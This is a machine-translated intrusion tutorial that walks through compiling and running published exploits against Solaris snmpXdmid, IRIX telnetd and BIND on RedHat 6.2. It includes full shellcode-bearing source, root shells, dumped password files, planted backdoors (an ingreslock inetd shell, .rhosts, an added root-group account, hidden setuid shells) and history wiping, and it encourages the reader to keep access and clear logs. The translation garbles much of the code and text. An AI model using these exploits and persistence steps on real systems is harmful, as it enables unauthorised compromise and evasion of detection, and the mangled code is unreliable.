# Gcc -o snmp snmp.c SNMP.c: in function `main ': SNMP.c: 135: Warning: Assignment Makes Pointer from Integer WITHOUT A CAST SNMP.C: 172: Warning: Passing Arg 4 of Pointer To Function from O incompatible pointer type Undefined first referenced symbol in file xdr_void /var/tmp/cca3rEDd.o clnttcp_create /var/tmp/cca3rEDd.o gethostbyname /var/tmp/cca3rEDd.o xdr_bool /var/tmp/cca3rEDd.o xdr_u_long / var / tmp /cca3rEDd.o authsys_create /var/tmp/cca3rEDd.o inet_addr /var/tmp/cca3rEDd.o clnt_pcreateerror /var/tmp/cca3rEDd.o xdr_array /var/tmp/cca3rEDd.o getsockname /var/tmp/cca3rEDd.o xdr_char /var/tmp/cca3redd.o xdr_point /var/tmp/cca3redd.o ld: Fatal: Symbol Refer Erming errors. No output Written to SNMP (*** Compilation ***) Collect2: ld returned 1 exit status # gcc -o snmp snmp.c -lnsl snmp.c: in function `main ': snmp.c: 135 : warning: assignment makes pointer from integer without a cast snmp.c: 172: warning: passing arg 4 of pointer to function from incompatible pointer type Undefined first referenced symbol in file getsockname /var/tmp/ccBaS71K.o ld: fatal: Symbol Referencing Errors. No Output Written To SNMP Collect: LD Returned 1 EXIT STATUS # gcc -o snmp snmp.c -lnsl -lsocket (*** To compile with NSL and Socket) SNMP.c: in function `main '
: Snmp.c: 135: warning: assignment makes pointer from integer without a cast snmp.c: 172: warning: passing arg 4 of pointer to function from incompatible pointer type # ./snmp copyright LAST STAGE OF DELIRIUM mar 2001 poland // LSD-PL.NET/ SNMPXDMID for Solaris 2.7 2.8 Sparc usage: ./snmp address [-p port] -v 7 | 8 #. / SNMP 192.168.0.4 -v 8 (*** 192.168.0.4 is Taunch SUNOS 5.8 SPARC machines ***) copyright LAST STAGE oF DELIRIUM mar 2001 poland //lsd-pl.net/ snmpXdmid for solaris 2.7 2.8 sparc adr = 0x000c8f68 timeout = 30 port = 928 connected! sent! SunOS business 5.8 Generic_108528-03 sun4u sparc SUNW ULTRA-250 ID UID = 0 (root) GID = 0 (root) Echo " "> /. Rhosts Echo 'IngreSlock Stream TCP NOWAIT ROOT / BIN / KSH KSH -I'> /TMP/.x / usr / Sbin / inetd -s /tmp/.x rm -f /tmp/.x telnet localhost 1524 TELNET 127.0.1 ... Connected to localhost. Escape character is '^]'. # id ksh: id ^ m: not Found # Id; uid = 0 (root) GID = 0 (root) KSH: ^ m: not found # exit; connection closed by Foreign Host. EXIT. EXIT (*** casually load a back door to walk people ***) # ----------------------------------- -------------- TEST ----------------------------------- --------------------------- Sunos 5.6 5.7 5.8 machines, find other systems. What system is the most broken? Win2000? Oh, I am talking about the UNIX series.
Tell everyone, IRIX is the most broken ~ Hoho ~ I remember that I swept it to an Irix machine, we went to kill it ~ ---------------------- ----------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------- # telnet 192.168.0.10 Trying 192.168.0.10. .. Connected to 192.168.0.10. Escape character is '^]'. Irix (O2) login: Test Password: ux: login: error: Login incorrect login: ^] telnet> quit connection closed. #Cat> telnetd.c ( *** Source program at http://lsd-pl.net/files/get?irix/irx_telnetd ***) # include # include
#include
#include
#include
#include
#include
#include
Char shellcode [] =
"/ X04 / X10 / XFF / XFF" / * Bltzal $ ZERO,
* /
"/ x24 / x02 / x03 / xf3" / * li $ v0,1011 * /
"/ X23 / XFF / X02 / X14" / * Addi $ RA, $ RA, 532 * /
"/ x23 / xe4 / xfe / x08" / * Addi $ A0, $ RA, -504 * /
"/ X23 / XE5 / XFE / X10" / * Addi $ A1, $ RA, -496 * /
"/ XAF / XE4 / XFE / X10" / * SW $ A0, -496 ($ ra) * /
"/ XAF / XE0 / XFE / X14" / * SW $ ZERO, -492 ($ ra) * /
"/ Xa3 / XE0 / XFE / X0F" / * SB $ ZERO, -497 ($ ra) * /
"/ X03 / XFF / XFF / XCC" / * syscall * /
"/ bin / sh"
;
TYPEDEF STRUCT {char * VERS;} tabent1_t;
Typedef struct {int FLG, LEN; INT GOT, G_OFS, SUBBUFFER, S_OFS;} tabent2_t;
Tabent1_t tab1 [] = {
{"Irix 6.2 Libc.so.1: no patches telnetd: no patches"},
{"Irix 6.2 Libc.so.1: 1918 | 2086 Telnetd: no patches"}
{"Irix 6.2 Libc.so.1: 3490 | 3723 | 3771 Telnetd: no patches"},
{"Irix 6.2 Libc.so.1: no patches telnetd: 1485 | 2070 | 3117 | 3414"},
{"IRIX 6.2 Libc.so.1: 1918 | 2086 Telnetd: 1485 | 2070 | 3117 | 3414"}, {"Irix 6.2 Libc.so.1: 3490 | 3723 | 3771 Telnetd: 1485 | 2070 | 3117 | 3414 }
{"Irix 6.3 Libc.so.1: no patches telnetd: {" irix 6.3 libc.so.1: 2087 telnetd: no patches "},
{"Irix 6.3 Libc.so.1: 3535 | 3737 | 3770 Telnetd: no patches"},
{"Irix 6.4 Libc.so.1: no patches telnetd: no patches"},
{"Irix 6.4 Libc.so.1: 3491 | 3769 | 3738 Telnetd: no patches"},
{"IRIX 6.5-6.5.8M 6.5-6.5.7F Telnetd: no patches"},
{"Irix 6.5.8F Telnetd: no patches"}
}
Tabent2_t tab2 [] = {
{0, 0x56, 0x0fb44390, 115, 0x7fc4d1e0, 0x14},
{0, 0x56, 0x0fb483b0, 117, 0x7fc4d1e0, 0x14},
{0, 0x56, 0x0fb50490, 122, 0x7fc4d1e0, 0x14},
{0, 0x56, 0x0fb44390, 115, 0x7fc4d220, 0x14},
{0, 0x56, 0x0fb483b0, 117, 0x7fc4d220, 0x14},
{0, 0x56, 0x0fb50490, 122, 0x7fc4d220, 0x14},
{0, 0x56, 0x0fb4fcE0, 104, 0x7fc4d230, 0x14},
{0, 0x56, 0x0fb4f690, 104, 0x7fc4d230, 0x14},
{0, 0x56, 0x0fb52900, 104, 0x7fc4d230, 0x14},
{1, 0x5e, 0x0fb576d8, 88, 0x7fc4cf70, 0x1c},
{1, 0x5e, 0x0fb4d6dc, 102, 0x7fc4cf70, 0x1c},
{1, 0x5e, 0x7fc496e8, 77, 0x7fc4cf98, 0x1c},
{1, 0x5e, 0x7fc496e0, 77, 0x7fc4cf98, 0x1c}
}
Char Env_Value [1024];
INT prepare_env (int version) {
INT I, ADR, PCH, ADRH, ADRL
Char * b;
PCH = Tab2 [VERS] .got (Tab2 [VERS] .G_OFS * 4);
ADR = Tab2 [VERS] .SUBBUFFER TAB2 [VERS] .s_ofs;
ADRH = (ADR >> 16) - Tab2 [VERS] .LEN;
ADRL = 0x10000- (ADRH & 0xFFFF) (ADR & 0xFFFF) -tab2 [VERS] .le;
B = ENV_ IF (! Tab2 [VERS] .flg) {
For (i = 0; i <1; i ) * b = '; for (i = 0; i <4; i ) * b = (char) ((PCH >> ((3-I% 4) * 8)) & 0xff);
For (i = 0; i <4; i ) * b = (char) ((PCH 2 >> ((3-I% 4) * 8) & 0xFF);
For (i = 0; i <3; i ) * b = '';
For (i = 0; i
* B = shellcode [i];
IF ((* (b-1) == (char) 0x02) || (* (b-1) == (char) 0xFF)) * b = shellcode [i];
}
Sprintf (B, "%%% 05DC %% 22 $ hn %%% 05DC %% 23 $ hn", Adrh, Adrl)
} else {
For (i = 0; i <5; i ) * b = '';
For (i = 0; i <4; i ) * b = (char) ((((((((((3-I% 4) * 8) & 0xFF);
For (i = 0; i <4; i ) * b = '';
For (i = 0; i <4; i ) * b = (char) ((PCH 2 >> ((3-I% 4) * 8) & 0xFF);
For (i = 0; i <3; i ) * b = '';
For (i = 0; i
* B = shellcode [i];
IF ((* (b-1) == (char) 0x02) || (* (b-1) == (char) 0xFF)) * b = shellcode [i];
}
Sprintf (B, "%%% 05DC %% 11 $ hn %%% 05dc %% 12 $ hn", Adrh, Adrl)
}
B = Strlen (b);
Return (b-env_value);
}
Main (int Argc, char ** argv) {
Char buffer [8192];
INT I, C, SCK, IL, IH, CNT, VERS = 65;
Struct hostent * hp;
Struct SockAddr_in ADR;
Printf ("Copyright Last Stage Of Delirium Jul 2000 Poland //LSD-PL.NET//N");
Printf ("Telnetd for Irix 6.2 6.3 6.4 6.5 6.5.8 IP: ALL / N / N");
IF (argc <2) {
Printf ("USAGE:% s address [-v 62 | 63 | 64 | 65] / n", Argv [0]);
EXIT (-1);
}
While ((c = getopt (argc-1, & argv [1], "sc: p: p:")))! = - 1) {
Switch (c) {
Case 'V': VERS = ATOI (OPTARG);
}
}
Switch (VERS) {
Case 62: IL = 0; IH = 5; BREAK;
Case 63: IL = 6; IH = 8; Break; Case 64: IL = 9; IH = 10; Break;
Case 65: IL = 11; IH = 12; Break;
DEFAULT: EXIT (-1);
}
For (i = IL; i <= IH; i ) {
Printf ("."); FFLUSH (stdout);
SCK = Socket (AF_INET, SOCK_STREAM, 0);
ADR.SIN_FAMILY = AF_INET;
ADR.SIN_PORT = HTONS (23);
IF ((adr.sin_addr.s_addr = inet_addr (argv [1])) == - 1) {
IF ((hp = gethostByname) == null) {
Errno = EADDRNOTAVAIL; PERROR ("error"); exit (-1);
}
Memcpy (& adj to_addr.s_addr, hp-> h_addr, 4);
}
IF (Connect (STRUCT SOCKADDR *) & ADR, SIZEOF (Struct SockAddr_in)) <0) {
PERROR ("error"); exit (-1);
}
CNT = prepare_env (i);
Memcpy (buffer, "/ x01 / x58 / x58 / x58 / x58 / x00", 10)
Sprintf (& Buffer [10], "% S / XFF / XF0", Env_Value);
Write (SCK, BUFFER, 10 CNT 2);
Sleep (1);
Memcpy (Buffer, "/ X01 / X5F / X24 / X00 / X01 / X00% S / XFF / XF0", 10)
Sprintf (& Buffer [10], "% S / XFF / XF0", Env_Value);
Write (SCK, BUFFER, 10 CNT 2);
IF (((CNT = Read (SCK, Buffer, SIZEOF (Buffer)) <2) || (Buffer [0]! = (char) 0xFF) {
Printf ("Warning: Telnetd Seems To BE Used with TCP Wrapper / N);
}
Write (SCK, "/ bin / uname -a / n", 14);
IF ((CNT = Read (SCK, Buffer, SIZEOF (Buffer))> 0) {
Printf ("/ n% s / n / n", tab1 [i] .vers);
Write (1, Buffer, CNT);
Break;
}
Close (SCK);
}
IF (i> IH) {Printf ("/ Nerror: not vulnerable / n"); exit (-1);}
While (1) {
FD_SET FDS;
FD_ZERO (& FDS);
FD_SET (0, & fds);
FD_SET (SCK, & FDS);
IF (SELECT (FD_SETSIZE, & FDS, NULL, NULL, NULL) {
int CNT;
Char BUF [1024];
IF (fd_isset (0, & fds)) {
IF ((CNT = Read (0, BUF, 1024)) <1) {
IF (errno == ewouldblock || errno == eagain) Continue;
Else Break;
Write (SCK, BUF, CNT);
}
IF (fd_isset (SCK, & FDS)) {
IF ((CNT = Read (SCK, BUF, 1024) <1) {
IF (errno == ewouldblock || errno == eagain) Continue;
Else Break;
}
Write (1, BUF, CNT);
}
}
}
}
^ D
# Gcc -o telnetd telnetd.c
Telnetd.c: 33: Parse Error Before `Irix '
Telnetd.c: 37: Malformed floating constant
Telnetd.c: 37: Nondigits in Number and Not Hexadecimal
Telnetd.c: 37: Malformed floating constant
Telnetd.c: 38: Malformed floating constant
Telnetd.c: 77: Nondigits in Number and Not Hexadecimal
... (*** Because the paste text is wrong, a lot of error messages ***)
# Vi telnetd.c (*** Hello to edit the program ***)
"telnetd.c" [new file]
#include
#include
#include
...
(*** Re-paste again ***)
...
"telnetd.c" [new file] 188 LINES, 6738 Characters
# Gcc -o telnetd telnetd.c
Undefined first referened
Symbol in file
Socket /var/tmp/ccuoeaph.o
GethostByname /var/tmp/ccuoeaph.o
INET_ADDR /VAR/TMP/CCUOEAPH.O
Connect /var/tmp/ccuoeaph.o
LD: Fatal: Symbol Referencing Errors. No Output Written To Telnetd
Collect2: ld returned 1 exit status
# Gcc -o telnetd telnetd.c -lsocket -lnsl
# ./Telnetd
Copyright last stage of delirium jul 2000 poland //lsd-pl.net/
Telnetd for Irix 6.2 6.3 6.4 6.5 6.5.8 IP: ALL
USAGE: ./telnetd address [-v 62 | 63 | 64 | 65]
# ./Telnetd 192.168.0.10 -v 65
Copyright last stage of delirium jul 2000 poland //lsd-pl.net/
Telnetd for Irix 6.2 6.3 6.4 6.5 6.5.8 IP: ALL
.
Irix 6.5-6.5.8M 6.5-6.5.7F Telnetd: no patches
Irix O2 6.5 05190004 IP32 (*** overflow success ***)
id
UID = 0 (root) GID = 0 (SYS)
CAT / etc / passwdroot: mmani4kyarae: 0: 0: super-user: /: / usr / bin / tcsh
sysadm: *: 0: 0: System V Administration: / usr / admin: / bin / sh
CMWLogin: *: 0: 994: CMW login Userid: / usr / cmw: / sbin / csh
Diag: *: 0: 996: Hardware Diagnostics: / usr / diags: / bin / csh
Daemon: *: 1: 1: daem: /: / dev / null
BIN: *: 2: 2: System Tools Owner: / bin: / dev / null
UUCP: *: 3: 5: UUCP OWNER: / USR / LIB / UUCP: / BIN / CSH
Sys: *: 4: 0: System Activity Owner: / VAR / ADM: / BIN / SH
ADM: *: 5: 3: Accounting Files Owner: / VAR / ADM: / BIN / SH
LP :: 9: 9: Print Spooler Owner: / var / spool / lp: / bin / sh *** Many people come in?
Nuucp :: 10: 10: Remote uucp user: / var / spool / uucppublic: / usr / lib / uucp / uuCico *
Auditor: *: 11: 0: Audit Activity Owner: / Auditor: / bin / sh
DBADMIN: *: 12: 0: Security Database Owner: / dbadmin: / bin / sh
SGIWeb: *: 13: 60001: SGI Web Applications: / VAR / WWW / HTDOCS: / BIN / CSH
Rfindd: *: 66: 1: RFIND Daemon and fsdump: / var / rfindd: / bin / sh
EZSETUP :: 992: 998: System setup: / var / sysadmdesktop / ezsetup: / bin / csh *
Demos :: 993: 997: Demonstration User: / usr / demos: / bin / csh *
Outofbox :: 995: 997: Out of Box Experience: / usr / people / outofbox: / bin / csh *
Guest :: 998: 998: Guest Accent: / usr / people / guest: / bin / csh *
4DGIFTS: *: 999: 998: 4DGifts Account: / usr / people / 4dgifts: / bin / csh
NoBody: *: 60001: 60001: SVR4 Nobody Uid: / dev / null: / dev / null
Noaccess: *: 60002: 60002: Uid no access: / dev / null: / dev / null
NoBody: *: 60001: 60001: Original Nobody Uid: / dev / null: / dev / null
Informix: *: 49999: 777: Informix SA 3.0: / USR / SGI / Informix: / Bin / CSH
POSUser: GYO7HUQ9BFNYE: 55555: 20 :::
Antoni: Zuzbvpoz6HC4G: 23117: 20: Antoniwang: / usr / people / antoni: / bin / csh
#mkdir / usr / lib / ... (*** There are so many users can log in, we can be a Suid root shell. ***)
Cp / bin / ksh /usr/lib/.../.x
CHMOD S /USR/LIB/... /
exit
#
------------------------------------------------ Test -------------------------------------------------- ------------ Attack IRIX 6.5 under the SunOS 5.7 platform successfully completed. :)
Let's find a few Linux playing. Looking for redhat, there are more vulnerabilities, such as rpc.statd wuftp bind lpd, etc. : P
We also use this SunOS 5.7 as our attacked Linux platform. LSD writes EXPLOIT universality is really good.
This time we use bind to overflow to attack RedHat 6.2
However, because of the Worm, Bind's success rate of Worm, Bind is already small.
You can try other distance overflow ~~
------------------------------------------------ Test -------------------------------------------------- ----------------
#cat> bind.c (*** source program at http://lsd-pl.net/files/get?linux/linx86_bind ***)
#include
#include
#include
#include
#include
#include
#include
Char msg [] = {
0xAb, 0xcd, 0x09,0x80,0x00,0x00,0x00,0x01,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00,
0x01, 0x20,0x20,0x20,0x20,0x02,0x61
}
Char asmcode [] =
"/ x3f" / * label Len 63 * /
"/ x90 / x90 / x90" / * padding * /
"/ Xeb / x3b" / * JMP
* /
"/ x31 / xdb" / * xorl% EBX,% EBX * /
"/ x5f" / * POPL% EDI * /
"/ x83 / XEF / X7C" / * SUB $ 0x7c,% EDI * /
"/ x8d / x77 / x10" / * LEAL 0X10 (% EDI),% ESI * /
"/ x89 / x77 / x04" / * movl% ESI, 0x4 (% EDI) * /
"/ x8d / x4f / x20" / * LEAL 0X20 (% EDI),% ECX * /
"/ x89 / x4f / x08" / * MOVL% ECX, 0x8 (% EDI) * /
"/ XB3 / X10" / * MOVB $ 0X10,% BL * /
"/ x89 / x19" / * MOVL% EBX, (% ECX) * /
"/ x31 / xc9" / * xorl% ECX,% ECX * /
"/ XB1 / XFF" / * MOVB $ 0xFF,% cl * / "/ x89 / x0f" / * movl% ECX, (% EDI) * /
"/ x51" / * pushl% ECX * /
"/ x31 / xc0" / * xorl% EAX,% EAX * /
"/ XB0 / X66" / * MOVB $ 0x66,% Al * /
"/ XB3 / X07" / * MOVB $ 0X7,% BL * /
"/ x89 / xf9" / * MOVL% EDI,% ECX * /
"/ xcd / x80" / * int $ 0x80 * /
"/ x59" / * POPL% ECX * /
"/ x31 / xdb" / * xorl% EBX,% EBX * /
"/ x39 / xd8" / * CMPL% EBX,% EAX * /
"/ x75 / x0a" / * jne
* /
"/ x66 / xbb / x12 / x34" / * MOVW $ 0x1234,% bx * /
"/ x66 / x39 / x5e / x02" / * cmpw% BX, 0x2 (% ESI) * /
"/ x74 / x08" / * JE
* /
"/ xe2 / xe0" / * loop
* /
"/ x3f" / * label Len 63 * /
"/ XE8 / XC0 / XFF / XFF / XFF" / * CALL
* /
"/ x89 / xcb" / * movl% ECX,% EBX * /
"/ x31 / xc9" / * xorl% ECX,% ECX * /
"/ XB1 / X03" / * MOVB $ 0x03,% CL * /
"/ x31 / xc0" / * xorl% EAX,% EAX * /
"/ XB0 / X3F" / * MOVB $ 0x3f,% Al * /
"/ x49" / * DECL% ECX * /
"/ xcd / x80" / * int $ 0x80 * /
"/ x41" / * incl% ECX "/ xe2 / xf6" / * loop
* /
"/ Xeb / X14" / * JMP * /
"/ x31 / xc0" / * xorl% EAX,% EAX * /
"/ x5b" / * popl% EBX * /
"/ x8d / x4b / x14" / * Leal 0x14 (% EBX),% ECX * /
"/ x89 / x19" / * MOVL% EBX, (% ECX) * /
"/ x89 / x43 / x18" / * movl% EAX, 0x18 (% EBX) * /
"/ x88 / x43 / x07" / * MOVB% Al, 0x7 (% EBX) * /
"/ x31 / xd2" / * xorl% EDX,% EDX * /
"/ XB0 / X0B" / * MOVB $ 0XB,% Al * /
"/ xcd / x80" / * int $ 0x80 * /
"/ XE8 / XE7 / XFF / XFF / XFF" / * CALL
* /
"/ bin / sh"
"/ x90 / x90 / x90 / x90" / * padding * /
"/ x90 / x90 / x90 / x90"
;
Int Rev (int a) {
INT i = 1;
IF ((* (char *) & i)) RETURN (A);
RETURN ((A >> 24) & 0xFF) | (((A >> 16) & 0xFF) << 8) | (((A >> 8) & 0xFF) << 16) | ((A & 0xFF) << 24);
}
INT main (int Argc, char ** argv) {
Char buffer [1024], * b;
INT I, C, N, SCK [2], FP, PTR6, JMP, CNT, OFS, FLAG = -1;
Struct hostent * hp;
Struct SockAddr_in ADR;
Printf ("Copyright Last Stage of Delirium Feb 2001 Poland //LSD-PL.NET//N");
Printf ("Bind 8.2 8.2.1 8.2.2 8.2.2px for Slackware 4.0 / RedHat 6.2 x86 / N / N");
IF (argc <2) {
Printf ("USAGE:% s address [-s] [- e] / n", argv [0]);
Printf ("-s send infoleak packet / n");
Printf ("-e send expel packet / n");
EXIT (-1);
}
While (c = getopt (argc-1, & argv [1], "se"))! = - 1) {
Switch (c) {
Case 's': Flag = 1; Break;
Case 'E': Flag = 2;
}
}
IF (Flag == - 1) exit (-1);
ADR.SIN_FAMILY = AF_INET;
ADR.SIN_PORT = HTONS (53); IF ((ADR.SIN_ADDR.S_ADDR = INET_ADDR (Argv [1])) == - 1) {
IF ((hp = gethostByname) == null) {
Errno = EADDRNOTAVAIL; goto err;
}
Memcpy (& adj to_addr.s_addr, hp-> h_addr, 4);
}
SCK [0] = Socket (AF_INET, SOCK_DGRAM, 0);
SCK [1] = Socket (AF_INET, SOCK_STREAM, 0);
IF (Connect (SCK [0], (Struct SockAddr *) & ADR, SIZEOF (ADR)) <0) goto err;
IF (Connect (SCK [1], (Struct Sockaddr *) & ADR, SIZEOF (ADR)) <0) Goto Err;
i = sizeof (struct sockaddr_in);
IF (GetSockName (STRUCT SOCKADDR *) & ADR, & I) == - 1) {
Struct NetBuf {UNSIGNED INT MAXLEN; CHAR * BUF;
Struct NetBuf NB;
IOCTL (SCK [1] (('s' << 8) | 2), "sockmod");
Nb.maxlen = 0xfffff;
nb.len = sizeof (struct sockaddr_in) ;;
Nb.buf = (char *) & ADR;
IOCTL (SCK [1] ((('T' << 8) | 144), & nb);
}
n = ntoHS (adr.sin_port);
ASMCODE [4 48 2] = (unsigned char) ((n >> 8) & 0xFF);
ASMCODE [4 48 3] = (unsigned char) (N & 0xFF);
IF (Write (SCK [0], MSG, SIZEOF (MSG)) == - 1) goto err;
IF ((CNT = Read (SCK [0], Buffer, SIZEOF (Buffer)) == - 1) goto ERR;
Printf ("stack dump: / n");
For (i = 0; i <(CNT-512); i ) {
Printf ("% s% 02x", (i && (! (i% 16)))? "/ n": "", (unsigned char) buffer [512 i]);
}
Printf ("/ n / n");
FP = REV (* (unsigned int *) & buffer [532]);
OFS = (0xfe) - ((FP- (FP & 0xFFFFFFFF00) & 0xFF);
CNT = 163;
IF ((Buffer [512 20 2]! = (char) 0xFF) && (Buffer [512 20 3]! = (char) 0xBF)) {
Printf ("System Does NOT Seem to Be a Vulnerable Linux / N"); exit (1);
}
IF (Flag == 1) {
Printf ("System Seems to Be Running Bind 8.2.x On A Linux / N"); EXIT (-1);}
IF (CNT <(OFS 28)) {
Printf ("Frame Ptr Is Too Low To Be SuccessFully ExploITED / N"); exit (-1);
}
JMP = REV (FP-586);
PTR6 = REV ((fp & 0xfffffff00) -12);
FP = REV (FP & 0xFfffffff00);
Printf ("FRAME PTR = 0x% 08X ADR =% 08X OFS =% D", REV (FP), REV (JMP), OFS)
Printf ("Port =% 04x Connected!", (unsigned short); fflush (stdout);
B = buffer;
Memcpy (B, "/ XAb / XCD / X00 / X00 / X00 / X00 / X00 / X01", 12); B = 12;
For (i = 0; i
For (i = 0; i <(128 >> 1); i , b ) * b = 0x01;
Memcpy (B, "/ X00 / X00 / X01 / X00 / X01", 5); B = 5;
For (i = 0; i <(((OFS 64) >> 1); i , b ) * b = 0x01;
* B = 28;
Memcpy (B, "/ X06 / X00 / X00 / X00", 4); B = 4;
Memcpy (B, & FP, 4); B = 4;
Memcpy (B, "/ X06 / X00 / X00 / X00", 4); B = 4;
Memcpy (B, & JMP, 4); B = 4;
Memcpy (B, & JMP, 4); B = 4;
Memcpy (B, & FP, 4); B = 4;
Memcpy (B, & PTR6, 4); B = 4;
CNT- = OFS 28;
For (i = 0; i <(cnt >> 1); i , b ) * b = 0x01;
Memcpy (B, "/ X00 / X00 / X00 / X00 / X01 / X00 / X00 / XFA / XFF", 9); B = 9;
IF (WRITE (SCK [0], Buffer, B- Buffer == - 1) goto err;
Sleep (1); Printf ("Sent! / N");
Write (SCK [1], "/ bin / uname -a / n", 14);
While (1) {
FD_SET FDS;
FD_ZERO (& FDS);
FD_SET (0, & fds);
FD_SET (SCK [1], & fds);
IF (SELECT (FD_SETSIZE, & FDS, NULL, NULL, NULL) {
int CNT;
Char BUF [1024];
IF (fd_isset (0, & fds)) {
IF ((CNT = Read (0, BUF, 1024)) <1) {
IF (errno == ewouldblock || errno == eagain) Continue;
Else Break;
}
Write (SCK [1], BUF, CNT);
IF (fd_isset (SCK [1], & fds)) {
IF ((CNT = Read (SCK [1], BUF, 1024) <1) {
IF (errno == ewouldblock || errno == eagain) Continue;
Else Break;
}
Write (1, BUF, CNT);
}
}
}
exit (0);
Err:
PERROR ("error"); exit (-1);
}
^ D
# Gcc -o bind bind.c -lnsl -lsocket
# ./Bind
Copyright last stage of delirium feb 2001 poland //lsd-pl.net/
Bind 8.2 8.2.1 8.2.2 8.2.2px for Slackware 4.0 / Redhat 6.2 x86
Usage: ./bind address [-s] [- e]
-S send infinder packet
-e send Exploit Packet
#. / bind 192.168.0.20 -e
Copyright last stage of delirium feb 2001 poland //lsd-pl.net/
Bind 8.2 8.2.1 8.2.2 8.2.2px for Slackware 4.0 / Redhat 6.2 x86
Stack dump:
42 24 08 08 02 00 B1 ED CA 42 C8 06 95 D0 15 C0
00 CB FA C0 A8 FC FF BF D6 58 08 08 90 3F 0D 08
F4 A4 10 40 16 00 00 01 00 00 00 90 3F 0D 08
05 00 00 00 E7 0B 08 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
A0 E0 05 08 F4 A4 10 40 C4 FC FF BF 60 E9 0C 08
00 00 00 C8 FD FD BF C8 FD FD FD FD BF 61 D6 05 08
90 3F 0D 08 BC 76 10 40 B4 11 10 40 14 Fe FF BF
01 00 00 00 BC 76 10 40
Frame PTR = 0xBffffc00 ADR = Bffffa5e OFS = 86 Port = E1FA Connected! Sent!
Linux localhost.localdomain 2.2.14-5.0 # 1 tue aug 22 16:49:06 Edt 2000 i686 unknown
Id
UID = 0 (root) GID = 0 (root)
CAT / etc / passwd
Root: x: 0: 0: root: / root: / bin / bash
BIN: X: 1: 1: bin: / bin:
Daemon: x: 2: 2: daem: / sbin:
ADM: X: 3: 4: ADM: / VAR / ADM:
LP: x: 4: 7: lp: / var / spool / lpd:
Sync: x: 5: 0: sync: / sbin: / bin / sync
Shutdown: x: 6: 0: shutdown: / sbin: / sbin / shutdown
Halt: x: 7: 0: Halt: / sbin: / sbin / halt
Mail: x: 8: 12: Mail: / var / spool / mail:
News: x: 9: 13: News: / var / spool / news:
UUCP: X: 10: 14: UUCP: / VAR / SPOOL / UUCP:
Operator: x: 11: 0: Operator: / root:
Games: x: 12: 100: Games: / usr / games:
Gopher: x: 13: 30: Gopher: / usr / lib / gopher-data:
FTP: X: 14: 50: FTP User: / Home / FTP:
Nobody: x: 99: 99: NoDy: /:
XFS: x: 43: 43: x font server: / etc / x11 / fs: / bin / false
GDM: X: 42: 42 :: / Home / GDM: / BIN / BASH
William: x: 500: 500: William Wang: / Home / William: / Bin / Bash
Www: x: 688: 501: Web User: / Home / WWW: / bin / bash
Xeye: x: 689: 501: Xeye Web User: / Home / Xeye: / Bin / Bash
TD_FTP: X: 655: 50: TD Bank FTP Client: / Home / TD_Bank: / BIN / BASH
Cyberplex: x: 690: 100: Cyber: / home / cyberplex: / bin / bash
Echo "Test: 1: 0 :: /: / bin / bash"> / etc / passwd
Telnet Localhost
Trying 127.0.0.1 ...
Connected to 127.0.0.1.
Escape Character is '^]'.
Red Hat Linux Release 6.2 (Zoot)
KERNEL 2.2.14-5.0 on AN i686
Login: Test
Bash $ ID
UID = 1 (bin) GID = 0 (root) groups = 0 (root)
Bash $ exit
Logout
Connection Closed by Foreign Host.
MKDIR / USR / LIB / ...
Cp / bin / sh/usr/lib/... /
CHMOD S /USR/LIB/... /
exit
#RM -RF /TMP /*.C
#mv bind / usr / lib / ...
#mv Test / USR / LIB / ...
#mv lpset / usr / lib / ...
#mv SNMP / USR / LIB / ...
#CD
#rm -rf .sh_history /.sh_history
#CHMOD 777 / USR / LIB / ...
#exit
$ EXIT
------------------------------------------------ Test -------------------------------------------------- ----------------
There are many, such as erasing of the back door installation and footprints.
In fact, it is more important to invade a system to keep your permissions on the system, so clear the log to avoid being discovered, and place the back door to enter this system again.
It is very important.
Because the tutorial I have written before, I will not write.
Everyone will slowly improve their own technology.
There is time to spread the results, such as RedHat 7.0 and the dead freebsd.
I want to think about it.
The meat chicken is coming back there, and the last invading course is finally written, goodbye ~
I will write some technical analysis articles.
Good luck ...
